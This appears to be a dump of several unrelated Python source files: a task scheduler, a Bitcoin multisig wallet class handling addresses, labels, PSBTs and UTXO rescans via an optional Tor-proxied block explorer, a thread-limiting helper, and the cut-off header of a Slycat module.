self.active = False
@property
def done(self):
return TaskResult.DONE
@property
def cont(self):
return TaskResult.CONT
@property
def wait(self):
return TaskResult.WAIT
@property
def duration(self):
return time.time() - self.timestamp
def execute(self):
if not callable(self.function):
raise TaskError('Failed to execute task %s, function not callable!' % self.name)
if self.can_delay:
if self.duration < self.delay:
return self.wait
else:
self.timestamp = time.time()
return self.function(self, *self.args, **self.kwargs)
def run(self):
if not self.active:
raise TaskError('Failed to run task %s, never activated!' % self.name)
return self.execute()
def destroy(self):
self.id = self.name = self.function = self.timestamp = self.args = self.kwargs = None
class TaskManagerError(RuntimeError):
"""
A task manager specific runtime error
"""
class TaskManager(object):
TIMEOUT = 0.01
def __init__(self):
self.running = {}
self.waiting = {}
self.id = 0
@property
def next_id(self):
self.id += 1; return self.id
def has(self, name):
return name in self.running or name in self.waiting
def delete(self, task, destroy):
try:
del self.waiting[task.name]
except KeyError:
del self.running[task.name]
if destroy:
task.destroy()
def activate(self, task):
if self.has(task.name):
raise TaskManagerError('Failed to activate task %s, already activated!' % task.name)
task.active = True
self.waiting[task.name] = task
return task
def deactivate(self, task, destroy=False):
if not self.has(task.name):
raise TaskManagerError('Failed to deactivate task %s, never activated!' % task.name)
task.active = False
self.delete(task, destroy)
def prepend(self, function, delay, *args, **kwargs):
task = Task(self.next_id)
task.function = function
task.delay = delay
task.args = args
task.kwargs = kwargs
return self.activate(task)
def add(self, function, *args, **kwargs):
return self.prepend(function, 0, *args, **kwargs)
def add_delayed(self, delay, function, *args, **kwargs):
return self.prepend(function, delay, *args, **kwargs)
def add_deferred(self, function):
def decorate(*args, **kwargs):
return self.add(function, *args, **kwargs)
return decorate
def remove(self, task):
self.deactivate(task, destroy=True)
def cycle(self, task):
self.deactivate(task)
self.activate(task)
def mainloop(self):
while True:
for name in list(self.waiting):
self.running[name] = self.waiting.pop(name)
for task in list(self.running.values()):
result = task.run()
if task.can_delay:
task.can_delay = False
if result == TaskResult.DONE:
self.remove(task)
elif result == TaskResult.CONT:
self.cycle(task)
elif result == TaskResult.WAIT:
task.can_delay = True
else:
self.remove(task)
time.sleep(self.TIMEOUT)
def run(self, threaded=True, daemon=True):
try:
if threaded:
thread = threading.Thread(target=self.mainloop)
thread.daemon = daemon
thread.start()
else:
self.mainloop()
except (KeyboardInterrupt, SystemExit):
self.destroy()
def destroy(self):
for name in list(self.waiting):
self.waiting.pop(name).destroy()
for name in list(self.running):
self.running.pop(name).destroy()
self.id = 0
|
wallet.py | import copy, hashlib, json, logging, os
import time
from hwilib.descriptor import AddChecksum
from .device import Device
from .key import Key
from .util.merkleblock import is_valid_merkle_proof
from .helpers import der_to_bytes, sort_descriptor, fslock, parse_utxo
from .util.base58 import decode_base58
from .util.xpub import get_xpub_fingerprint
from hwilib.serializations import PSBT, CTransaction
from io import BytesIO
from .specter_error import SpecterError
import threading
import requests
from math import ceil
logger = logging.getLogger()
class Wallet():
# if the wallet is old we import 300 addresses
IMPORT_KEYPOOL = 300
# a gap of 20 addresses is what many wallets do
GAP_LIMIT = 20
# minimal fee rate is slightly above 1 sat/vbyte
# to avoid rounding errors
MIN_FEE_RATE = 1.01
def __init__(
self,
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=False,
last_block=None,
):
self.name = name
self.alias = alias
self.description = description
self.address_type = address_type
self.address = address
self.address_index = address_index
self.change_address = change_address
self.change_index = change_index
self.keypool = keypool
self.change_keypool = change_keypool
self.recv_descriptor = recv_descriptor
self.change_descriptor = change_descriptor
self.keys = keys
self.devices = [
(
device
if isinstance(device, Device)
else device_manager.get_by_alias(device)
)
for device in devices
]
if None in self.devices:
raise Exception(
'A device used by this wallet could not have been found!'
)
self.sigs_required = int(sigs_required)
self.pending_psbts = pending_psbts
self.fullpath = fullpath
self.manager = manager
self.rpc = self.manager.rpc.wallet(
os.path.join(self.manager.rpc_path, self.alias)
)
self.last_block = last_block
if address == '':
self.getnewaddress()
if change_address == '':
self.getnewaddress(change=True)
self.getdata()
self.update()
if old_format_detected or self.last_block != last_block:
self.save_to_file()
def update(self):
self.get_balance()
self.check_addresses()
self.get_info()
def check_addresses(self):
"""Checking the gap limit is still ok"""
if self.last_block is None:
obj = self.rpc.listsinceblock()
else:
# sometimes last_block is invalid, not sure why
try:
obj = self.rpc.listsinceblock(self.last_block)
except:
logger.error(f"Invalid block {self.last_block}")
obj = self.rpc.listsinceblock()
txs = obj["transactions"]
last_block = obj["lastblock"]
addresses = [tx["address"] for tx in txs]
# remove duplicates
addresses = list(dict.fromkeys(addresses))
if len(addresses) > 0:
# prepare rpc call
calls = [("getaddressinfo",addr) for addr in addresses]
# extract results
res = [r["result"] for r in self.rpc.multi(calls)]
# extract last two indexes of hdkeypath
paths = [d["hdkeypath"].split("/")[-2:] for d in res if "hdkeypath" in d]
# get change and recv addresses
max_recv = max([int(p[1]) for p in paths if p[0]=="0"], default=-1)
max_change = max([int(p[1]) for p in paths if p[0]=="1"], default=-1)
# these calls will happen only if current addresses are used
updated = False
while max_recv >= self.address_index:
self.getnewaddress(change=False, save=False)
updated = True
while max_change >= self.change_index:
self.getnewaddress(change=True, save=False)
updated = True
# save only if needed
if updated:
self.save_to_file()
self.last_block = last_block
@staticmethod
def parse_old_format(wallet_dict, device_manager):
old_format_detected = False
new_dict = {}
new_dict.update(wallet_dict)
if 'key' in wallet_dict:
new_dict['keys'] = [wallet_dict['key']]
del new_dict['key']
old_format_detected = True
if 'device' in wallet_dict:
new_dict['devices'] = [wallet_dict['device']]
del new_dict['device']
old_format_detected = True
devices = [device_manager.get_by_alias(device) for device in new_dict['devices']]
if len(new_dict['keys']) > 1 and 'sortedmulti' not in new_dict['recv_descriptor']:
new_dict['recv_descriptor'] = AddChecksum(new_dict['recv_descriptor'].replace('multi', 'sortedmulti').split('#')[0])
old_format_detected = True
if len(new_dict['keys']) > 1 and 'sortedmulti' not in new_dict['change_descriptor']:
new_dict['change_descriptor'] = AddChecksum(new_dict['change_descriptor'].replace('multi', 'sortedmulti').split('#')[0])
old_format_detected = True
if None in devices:
devices = [((device['name'] if isinstance(device, dict) else device) if (device['name'] if isinstance(device, dict) else device) in device_manager.devices else None) for device in new_dict['devices']]
if None in devices:
raise Exception('A device used by this wallet could not have been found!')
else:
new_dict['devices'] = [device_manager.devices[device].alias for device in devices]
old_format_detected = True
new_dict['old_format_detected'] = old_format_detected
return new_dict
@classmethod
def from_json(cls, wallet_dict, device_manager, manager, default_alias='', default_fullpath=''):
name = wallet_dict.get('name', '')
alias = wallet_dict.get('alias', default_alias)
description = wallet_dict.get('description', '')
address = wallet_dict.get('address', '')
address_index = wallet_dict.get('address_index', 0)
change_address = wallet_dict.get('change_address', '')
change_index = wallet_dict.get('change_index', 0)
keypool = wallet_dict.get('keypool', 0)
change_keypool = wallet_dict.get('change_keypool', 0)
sigs_required = wallet_dict.get('sigs_required', 1)
pending_psbts = wallet_dict.get('pending_psbts', {})
fullpath = wallet_dict.get('fullpath', default_fullpath)
last_block = wallet_dict.get('last_block', None)
wallet_dict = Wallet.parse_old_format(wallet_dict, device_manager)
try:
address_type = wallet_dict['address_type']
recv_descriptor = wallet_dict['recv_descriptor']
change_descriptor = wallet_dict['change_descriptor']
keys = [Key.from_json(key_dict) for key_dict in wallet_dict['keys']]
devices = wallet_dict['devices']
except:
raise Exception('Could not construct a Wallet object from the data provided.')
return cls(
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=wallet_dict['old_format_detected'],
last_block=last_block
)
def get_info(self):
try:
self.info = self.rpc.getwalletinfo()
except Exception:
self.info = {}
return self.info
def getdata(self):
try:
self.utxo = parse_utxo(self, self.rpc.listunspent(0))
self.utxo_labels_list = self.getlabels(utxo["address"] for utxo in self.utxo)
except Exception:
self.utxo = []
self.utxo_labels_list = {}
self.get_info()
# TODO: Should do the same for the non change address (?)
# check if address was used already
try:
value_on_address = self.rpc.getreceivedbyaddress(
self.change_address,
0
)
except:
# Could happen if address not in wallet (wallet was imported)
# try adding keypool
logger.info(f"Didn't get transactions on address {self.change_address}. Refilling keypool.")
self.keypoolrefill(0, end=self.keypool, change=False)
self.keypoolrefill(0, end=self.change_keypool, change=True)
value_on_address = 0
# if not - just return
if value_on_address > 0:
self.change_index += 1
self.getnewaddress(change=True)
@property
def json(self):
return {
"name": self.name,
"alias": self.alias,
"description": self.description,
"address_type": self.address_type,
"address": self.address,
"address_index": self.address_index,
"change_address": self.change_address,
"change_index": self.change_index,
"keypool": self.keypool,
"change_keypool": self.change_keypool,
"recv_descriptor": self.recv_descriptor,
"change_descriptor": self.change_descriptor,
"keys": [key.json for key in self.keys],
"devices": [device.alias for device in self.devices],
"sigs_required": self.sigs_required,
"pending_psbts": self.pending_psbts,
"fullpath": self.fullpath,
"last_block": self.last_block,
"blockheight": self.blockheight,
"labels": self.export_labels()
}
def save_to_file(self):
with fslock:
with open(self.fullpath, "w+") as f:
json.dump(self.json, f, indent=4)
self.manager.update()
@property
def is_multisig(self):
return len(self.keys) > 1
@property
def locked_amount(self):
amount = 0
for psbt in self.pending_psbts:
amount += sum([utxo["witness_utxo"]["amount"] for utxo in self.pending_psbts[psbt]["inputs"]])
return amount
def delete_pending_psbt(self, txid):
try:
self.rpc.lockunspent(True, self.pending_psbts[txid]["tx"]["vin"])
except:
# UTXO was spent
pass
if txid in self.pending_psbts:
del self.pending_psbts[txid]
self.save_to_file()
def update_pending_psbt(self, psbt, txid, raw):
if txid in self.pending_psbts:
self.pending_psbts[txid]["base64"] = psbt
decodedpsbt = self.rpc.decodepsbt(psbt)
signed_devices = self.get_signed_devices(decodedpsbt)
self.pending_psbts[txid]["devices_signed"] = [dev.name for dev in signed_devices]
if "hex" in raw:
self.pending_psbts[txid]["sigs_count"] = self.sigs_required
self.pending_psbts[txid]["raw"] = raw["hex"]
else:
self.pending_psbts[txid]["sigs_count"] = len(signed_devices)
self.save_to_file()
return self.pending_psbts[txid]
else:
raise SpecterError("Can't find pending PSBT with this txid")
def save_pending_psbt(self, psbt):
self.pending_psbts[psbt["tx"]["txid"]] = psbt
self.rpc.lockunspent(False, psbt["tx"]["vin"])
self.save_to_file()
def txlist(self, idx, wallet_tx_batch=100, validate_merkle_proofs=False):
try:
rpc_txs = self.rpc.listtransactions("*", wallet_tx_batch + 2, wallet_tx_batch * idx, True) # get batch + 2 to make sure you have information about send
rpc_txs.reverse()
transactions = rpc_txs[:wallet_tx_batch]
except:
return []
result = []
blocks = {}
for tx in transactions:
if 'confirmations' not in tx:
tx['confirmations'] = 0
if len([_tx for _tx in rpc_txs if (_tx['txid'] == tx['txid'] and _tx['address'] == tx['address'])]) > 1:
continue # means the tx is duplicated (change), continue
tx['validated_blockhash'] = "" # default is assume unvalidated
if validate_merkle_proofs is True and tx['confirmations'] > 0 and tx.get('blockhash'):
proof_hex = self.rpc.gettxoutproof([tx['txid']], tx['blockhash'])
logger.debug(f"Attempting merkle proof validation of tx { tx['txid'] } in block { tx['blockhash'] }")
if is_valid_merkle_proof(
proof_hex=proof_hex,
target_tx_hex=tx['txid'],
target_block_hash_hex=tx['blockhash'],
target_merkle_root_hex=None,
):
# NOTE: this does NOT guarantee this blockhash is actually in the real Bitcoin blockchain!
# See merkletooltip.html for details
logger.debug(f"Merkle proof of { tx['txid'] } validation success")
tx['validated_blockhash'] = tx['blockhash']
else:
logger.warning(f"Attempted merkle proof validation on {tx['txid']} but failed. This is likely a configuration error but perhaps your node is compromised! Details: {proof_hex}")
result.append(tx)
return result
def rescanutxo(self, explorer=None):
t = threading.Thread(target=self._rescan_utxo_thread, args=(explorer,))
t.start()
def export_labels(self):
labels = self.rpc.listlabels()
if "" in labels:
labels.remove("")
res = self.rpc.multi([
("getaddressesbylabel", label)
for label in labels
])
return { labels[i]: list(result['result'].keys()) for i, result in enumerate(res) }
def import_labels(self, labels):
# format:
# {
# 'label1': ['address1', 'address2'],
# 'label2': ['address3', 'address4']
# }
#
rpc_calls = [("setlabel", address, label) for label, addresses in labels.items() for address in addresses]
if rpc_calls:
self.rpc.multi(rpc_calls)
def _rescan_utxo_thread(self, explorer=None):
# rescan utxo is pretty fast,
# so we can check large range of addresses
# and adjust keypool accordingly
args = [
"start",
[{
"desc": self.recv_descriptor,
"range": max(self.keypool, 1000)
},{
"desc": self.change_descriptor,
"range": max(self.change_keypool, 1000)
}]
]
unspents = self.rpc.scantxoutset(*args)["unspents"]
# if keypool adjustments fails - not a big deal
try:
# check derivation indexes in found unspents (last 2 indexes in [brackets])
derivations = [tx["desc"].split("[")[1].split("]")[0].split("/")[-2:]
for tx in unspents]
# get max derivation for change and receive branches
max_recv = max([-1]+[int(der[1]) for der in derivations if der[0] == '0'])
max_change = max([-1]+[int(der[1]) for der in derivations if der[0] == '1'])
updated = False
if max_recv >= self.address_index:
# skip to max_recv
self.address_index = max_recv
# get next
self.getnewaddress(change=False, save=False)
updated = True
while max_change >= self.change_index:
# skip to max_change
self.change_index = max_change
# get next
self.getnewaddress(change=True, save=False)
updated = True
# save only if needed
if updated:
self.save_to_file()
except Exception as e:
logger.warning(f"Failed to get derivation path from utxo transaction: {e}")
# keep working with unspents
res = self.rpc.multi([
("getblockhash", tx["height"])
for tx in unspents
])
block_hashes = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["blockhash"] = block_hashes[i]
res = self.rpc.multi([
("gettxoutproof", [tx["txid"]], tx["blockhash"])
for tx in unspents
])
proofs = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["proof"] = proofs[i]
res = self.rpc.multi([
("getrawtransaction", tx["txid"], False, tx["blockhash"])
for tx in unspents
])
raws = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["raw"] = raws[i]
missing = [tx for tx in unspents if tx["raw"] is None]
existing = [tx for tx in unspents if tx["raw"] is not None]
self.rpc.multi([
("importprunedfunds", tx["raw"], tx["proof"])
for tx in existing
])
# handle missing transactions now
# if Tor is running, requests will be sent over Tor
if explorer is not None:
try:
requests_session = requests.Session()
requests_session.proxies['http'] = 'socks5h://localhost:9050'
requests_session.proxies['https'] = 'socks5h://localhost:9050'
requests_session.get(explorer)
except Exception:
requests_session = requests.Session()
# make sure there is no trailing /
explorer = explorer.rstrip("/")
try:
# get raw transactions
raws = [requests_session.get(
f"{explorer}/api/tx/{tx['txid']}/hex"
).text
for tx in missing]
# get proofs
proofs = [requests_session.get(
f"{explorer}/api/tx/{tx['txid']}/merkleblock-proof"
).text
for tx in missing]
# import funds
self.rpc.multi([
("importprunedfunds", raws[i], proofs[i])
for i in range(len(raws))
])
except Exception as e:
logger.warning(f"Failed to fetch data from block explorer: {e}")
@property
def rescan_progress(self):
"""Returns None if rescanblockchain is not launched,
value between 0 and 1 otherwise
"""
if "scanning" not in self.info or self.info["scanning"] == False:
return None
else:
return self.info["scanning"]["progress"]
@property
def blockheight(self):
txs = self.rpc.listtransactions("*", 100, 0, True)
i = 0
while (len(txs) == 100):
i += 1
next_txs = self.rpc.listtransactions("*", 100, i * 100, True)
if (len(next_txs) > 0):
txs = next_txs
else:
break
current_blockheight = self.rpc.getblockcount()
if len(txs) > 0 and 'confirmations' in txs[0]:
blockheight = current_blockheight - txs[0]['confirmations'] - 101 # To ensure coinbase transactions are indexed properly
return 0 if blockheight < 0 else blockheight # To ensure regtest don't have negative blockheight
return current_blockheight
@property
def account_map(self):
return '{ "label": "' + self.name.replace("'","\\'") + '", "blockheight": ' + str(self.blockheight) + ', "descriptor": "' + self.recv_descriptor.replace("/", "\\/") + '" }'
def getnewaddress(self, change=False, save=True):
label = "Change" if change else "Address"
if change:
self.change_index += 1
index = self.change_index
else:
self.address_index += 1
index = self.address_index
address = self.get_address(index, change=change)
self.setlabel(address, "{} #{}".format(label, index))
if change:
self.change_address = address
else:
self.address = address
if save:
self.save_to_file()
return address
def get_address(self, index, change=False, check_keypool=True):
if check_keypool:
pool = self.change_keypool if change else self.keypool
if pool < index + self.GAP_LIMIT:
self.keypoolrefill(pool, index + self.GAP_LIMIT, change=change)
desc = self.change_descriptor if change else self.recv_descriptor
if self.is_multisig:
try:
# first try with sortedmulti
addr = self.rpc.deriveaddresses(desc, [index, index+1])[0]
except Exception:
# if sortedmulti is not supported
desc = sort_descriptor(
self.rpc,
desc,
index=index,
change=change
)
addr = self.rpc.deriveaddresses(desc)[0]
return addr
return self.rpc.deriveaddresses(desc, [index, index + 1])[0]
def get_descriptor(self, index=None, change=False, address=None):
"""
Returns address descriptor from index, change
or from address belonging to the wallet.
"""
if address is not None:
d = self.rpc.getaddressinfo(address)['desc']
path = d.split("[")[1].split("]")[0].split("/")
change = bool(int(path[-2]))
index = int(path[-1])
if index is None:
index = self.change_index if change else self.address_index
desc = self.change_descriptor if change else self.recv_descriptor
desc = desc.split("#")[0]
return AddChecksum(desc.replace("*",f"{index}"))
def get_balance(self):
try:
self.balance = self.rpc.getbalances()["watchonly"]
except:
self.balance = { "trusted": 0, "untrusted_pending": 0 }
return self.balance
def keypoolrefill(self, start, end=None, change=False):
if end is None:
end = start + self.GAP_LIMIT
desc = self.recv_descriptor if not change else self.change_descriptor
args = [
{
"desc": desc,
"internal": change,
"range": [start, end],
"timestamp": "now",
"keypool": True,
"watchonly": True
}
]
if not self.is_multisig:
r = self.rpc.importmulti(args, {"rescan": False})
# bip67 requires sorted public keys for multisig addresses
else:
# try if sortedmulti is supported
r = self.rpc.importmulti(args, {"rescan": False})
# doesn't raise, but instead returns "success": False
if not r[0]['success']:
# first import normal multi
# remove checksum
desc = desc.split("#")[0]
# switch to multi
desc = desc.replace("sortedmulti", "multi")
# add checksum
desc = AddChecksum(desc)
# update descriptor
args[0]["desc"] = desc
r = self.rpc.importmulti(args, {"rescan": False})
# make a batch of single addresses to import
arg = args[0]
# remove range key
arg.pop("range")
batch = []
for i in range(start, end):
sorted_desc = sort_descriptor(
self.rpc,
desc,
index=i,
change=change
)
# create fresh object
obj = {}
obj.update(arg)
obj.update({"desc": sorted_desc})
batch.append(obj)
r = self.rpc.importmulti(batch, {"rescan": False})
if change:
self.change_keypool = end
else:
self.keypool = end
self.rpc.multi([
(
"setlabel",
self.get_address(i, change=change, check_keypool=False),
"{} #{}".format(
"Change" if change else "Address", i
)
)
for i in range(start, end)
])
self.save_to_file()
return end
def utxo_on_address(self, address):
utxo = [tx for tx in self.utxo if tx["address"] == address]
return len(utxo)
def balance_on_address(self, address):
balancelist = [utxo["amount"] for utxo in self.utxo if utxo["address"] == address]
return sum(balancelist)
def utxo_on_label(self, label):
return len([tx for tx in self.utxo if self.utxo_labels_list[tx["address"]] == label])
def balance_on_label(self, label):
return sum(utxo["amount"] for utxo in self.utxo if self.utxo_labels_list[utxo["address"]] == label)
def addresses_on_label(self, label):
return list(dict.fromkeys(
[address for address in (self.addresses + self.change_addresses) if self.getlabel(address) == label]
))
@property
def is_current_address_used(self):
return self.balance_on_address(self.address) > 0
def utxo_addresses(self, idx=0, wallet_utxo_batch=100):
return list(
dict.fromkeys(
list(reversed([
utxo["address"] for utxo in sorted(
self.utxo, key = lambda utxo: utxo["time"]
)
]))[(wallet_utxo_batch * idx):(wallet_utxo_batch * (idx + 1))]
)
)
def utxo_labels(self, idx=0, wallet_utxo_batch=100):
return list(
dict.fromkeys(
list(reversed([
self.utxo_labels_list[utxo["address"]] for utxo in sorted(
self.utxo, key = lambda utxo: utxo["time"]
)
]))[(wallet_utxo_batch * idx):(wallet_utxo_batch * (idx + 1))]
)
)
def setlabel(self, address, label):
self.rpc.setlabel(address, label)
def getlabel(self, address):
return self.getlabels([address])[address]
def getlabels(self, addresses):
labels = {}
addresses_infos = self.rpc.multi([('getaddressinfo', address) for address in addresses])
for address_info in addresses_infos:
address_info = address_info['result']
# Bitcoin Core version 0.20.0 has replaced the `label` field with `labels`, an array currently limited to a single item.
label = address_info["labels"][0] if (
"labels" in address_info
and (isinstance(address_info["labels"], list)
and len(address_info["labels"]) > 0)
and "label" not in address_info) else address_info["address"]
if label == "":
label = address_info["address"]
labels[address_info["address"]] = address_info["label"] if "label" in address_info and address_info["label"] != "" else label
return labels
def get_address_name(self, address, addr_idx):
if self.getlabel(address) == address and addr_idx > -1:
self.setlabel(address, "Address #{}".format(addr_idx))
return self.getlabel(address)
@property
def fullbalance(self):
balance = self.balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def available_balance(self):
locked_utxo = self.rpc.listlockunspent()
# copy
balance = {}
balance.update(self.balance)
for tx in locked_utxo:
tx_data = self.rpc.gettransaction(tx["txid"])
raw_tx = self.rpc.decoderawtransaction(tx_data["hex"])
if "confirmations" not in tx_data or tx_data["confirmations"] == 0:
balance["untrusted_pending"] -= raw_tx["vout"][tx["vout"]]["value"]
else:
balance["trusted"] -= raw_tx["vout"][tx["vout"]]["value"]
return balance
@property
def full_available_balance(self):
balance = self.available_balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def addresses(self):
return [self.get_address(idx) for idx in range(0, self.address_index + 1)]
@property
def change_addresses(self):
return [self.get_address(idx, change=True) for idx in range(0, self.change_index + 1)]
@property
def wallet_addresses(self):
return self.addresses + self.change_addresses
def createpsbt(self, addresses:[str], amounts:[float], subtract:bool=False, subtract_from:int=0, fee_rate:float=1.0, selected_coins=[], readonly=False):
"""
fee_rate: in sat/B or BTC/kB. If set to 0 Bitcoin Core sets feeRate automatically.
"""
if fee_rate > 0 and fee_rate < self.MIN_FEE_RATE:
fee_rate = self.MIN_FEE_RATE
if self.full_available_balance < sum(amounts):
raise SpecterError('The wallet does not have sufficient funds to make the transaction.')
extra_inputs = []
if self.available_balance["trusted"] < sum(amounts):
txlist = self.rpc.listunspent(0, 0)
b = sum(amounts) - self.available_balance["trusted"]
for tx in txlist:
extra_inputs.append({"txid": tx["txid"], "vout": tx["vout"]})
b -= tx["amount"]
if b < 0:
break
elif selected_coins != []:
still_needed = sum(amounts)
for coin in selected_coins:
coin_txid = coin.split(",")[0]
coin_vout = int(coin.split(",")[1])
coin_amount = float(coin.split(",")[2])
extra_inputs.append({"txid": coin_txid, "vout": coin_vout})
still_needed -= coin_amount
if still_needed < 0:
break
if still_needed > 0:
raise SpecterError("Selected coins does not cover Full amount! Please select more coins!")
# subtract fee from amount of this output:
# currently only one address is supported, so either
# empty array (subtract from change) or [0]
subtract_arr = [subtract_from] if subtract else []
options = {
"includeWatching": True,
"changeAddress": self.change_address,
"subtractFeeFromOutputs": subtract_arr
}
self.setlabel(self.change_address, "Change #{}".format(self.change_index))
if fee_rate > 0:
# bitcoin core needs us to convert sat/B to BTC/kB
options["feeRate"] = round((fee_rate * 1000) / 1e8, 8)
# don't reuse change addresses - use getrawchangeaddress instead
r = self.rpc.walletcreatefundedpsbt(
extra_inputs, # inputs
[{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
0, # locktime
options, # options
True # bip32-der
)
b64psbt = r["psbt"]
psbt = self.rpc.decodepsbt(b64psbt)
if fee_rate > 0.0:
psbt_fees_sats = int(psbt['fee'] * 1e8)
# estimate final size: add weight of inputs
tx_full_size = ceil(psbt['tx']['vsize']
+ len(psbt["inputs"])*self.weight_per_input/4)
adjusted_fee_rate = fee_rate * (
fee_rate / (psbt_fees_sats / psbt['tx']['vsize'])
) * (tx_full_size / psbt['tx']['vsize'])
options["feeRate"] = '%.8f' % round((adjusted_fee_rate * 1000) / 1e8, 8)
r = self.rpc.walletcreatefundedpsbt(
extra_inputs, # inputs
[{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
0, # locktime
options, # options
True # bip32-der
)
b64psbt = r["psbt"]
psbt = self.rpc.decodepsbt(b64psbt)
psbt["fee_rate"] = options["feeRate"]
# estimate full size
tx_full_size = ceil(psbt['tx']['vsize']
+ len(psbt["inputs"])*self.weight_per_input/4)
psbt["tx_full_size"] = tx_full_size
psbt['base64'] = b64psbt
psbt["amount"] = amounts
psbt["address"] = addresses
psbt["time"] = time.time()
psbt["sigs_count"] = 0
if not readonly:
self.save_pending_psbt(psbt)
return psbt
def fill_psbt(self, b64psbt, non_witness:bool=True, xpubs:bool=True):
psbt = PSBT()
psbt.deserialize(b64psbt)
if non_witness:
for i, inp in enumerate(psbt.tx.vin):
txid = inp.prevout.hash.to_bytes(32,'big').hex()
try:
res = self.rpc.gettransaction(txid)
except:
raise SpecterError("Can't find previous transaction in the wallet.")
stream = BytesIO(bytes.fromhex(res["hex"]))
prevtx = CTransaction()
prevtx.deserialize(stream)
psbt.inputs[i].non_witness_utxo = prevtx
else:
# remove non_witness_utxo if we don't want them
for inp in psbt.inputs:
if inp.witness_utxo is not None:
inp.non_witness_utxo = None
if xpubs:
# for multisig add xpub fields
if len(self.keys) > 1:
for k in self.keys:
key = b'\x01' + decode_base58(k.xpub)
if k.fingerprint != '':
fingerprint = bytes.fromhex(k.fingerprint)
else:
fingerprint = get_xpub_fingerprint(k.xpub)
if k.derivation != '':
der = der_to_bytes(k.derivation)
else:
der = b''
value = fingerprint + der
psbt.unknown[key] = value
return psbt.serialize()
def get_signed_devices(self, decodedpsbt):
signed_devices = []
# check who already signed
for i, key in enumerate(self.keys):
sigs = 0
for inp in decodedpsbt["inputs"]:
if "bip32_derivs" not in inp:
# how are we going to sign it???
break
if "partial_signatures" not in inp:
# nothing to update - no signatures for this input
break
for der in inp["bip32_derivs"]:
if der["master_fingerprint"] == key.fingerprint:
if der["pubkey"] in inp["partial_signatures"]:
sigs += 1
# ok we have all signatures from this key (device)
if sigs >= len(decodedpsbt["inputs"]):
# assuming that order of self.devices and self.keys is the same
signed_devices.append(self.devices[i])
return signed_devices
def importpsbt(self, b64psbt):
# TODO: check maybe some of the inputs are already locked
psbt = self.rpc.decodepsbt(b64psbt)
psbt['base64'] = b64psbt
amount = []
address = []
# get output address and amount
for out in psbt["tx"]["vout"]:
if "addresses" not in out["scriptPubKey"] or len(out["scriptPubKey"]["addresses"]) == 0:
# TODO: we need to handle it somehow differently
raise SpecterError("Sending to raw scripts is not supported yet")
addr = out["scriptPubKey"]["addresses"][0]
info = self.rpc.getaddressinfo(addr)
# check if it's a change
if info["iswatchonly"] or info["ismine"]:
continue
address.append(addr)
amount.append(out["value"])
# detect signatures
signed_devices = self.get_signed_devices(psbt)
psbt["devices_signed"] = [dev.name for dev in signed_devices]
psbt["amount"] = amount
psbt["address"] = address
psbt["time"] = time.time()
psbt["sigs_count"] = len(signed_devices)
raw = self.rpc.finalizepsbt(b64psbt)
if "hex" in raw:
psbt["raw"] = raw["hex"]
self.save_pending_psbt(psbt)
return psbt
@property
def weight_per_input(self):
"""Calculates the weight of a signed input"""
if self.is_multisig:
input_size = 3 # OP_M OP_N ... OP_CHECKMULTISIG
# pubkeys
input_size += 34 * len(self.keys)
# signatures
input_size += 75 * self.sigs_required
if not self.recv_descriptor.startswith('wsh'):
# P2SH scriptsig: 22 00 20 <32-byte-hash>
input_size += 35 * 4
return input_size
# else: single-sig
if self.recv_descriptor.startswith('wpkh'):
# pubkey, signature
return 75 + 34
# pubkey, signature, 4* P2SH: 16 00 14 20-byte-hash
return 75 + 34 + 23 * 4
|
thread.py | # Copyright (C) 2011 Victor Semionov
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of the contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading
import logging
_max_threads = 0
_guard_sem = None
logger = None
is_threaded = True
is_subproc = False
Lock = threading.Lock
def configure(config):
global _max_threads, _guard_sem
_max_threads = config.getint("max-clients", 20)
if _max_threads:
_guard_sem = threading.Semaphore(_max_threads)
global logger
logger = logging.getLogger(__name__)
logger.debug("initialized")
def thread_task(task, sock, *args):
logger.debug("thread started")
try:
task(sock, *args)
except Exception:
logger.exception("unhandled exception")
finally:
logger.debug("thread exiting")
if _max_threads:
_guard_sem.release()
def process(task, sock, *args):
if _max_threads:
if not _guard_sem.acquire(False):
logger.warning("max-clients limit exceeded; waiting for a thread to terminate")
_guard_sem.acquire()
thr = threading.Thread(target=thread_task, args = (task, sock) + args)
thr.daemon = True
thr.start()
|
slycat-timeseries-model.py | # Copyright (c) 2013, 2018 National Technology and Engineering Solutions of Sandia, LLC . Under the terms of Contract
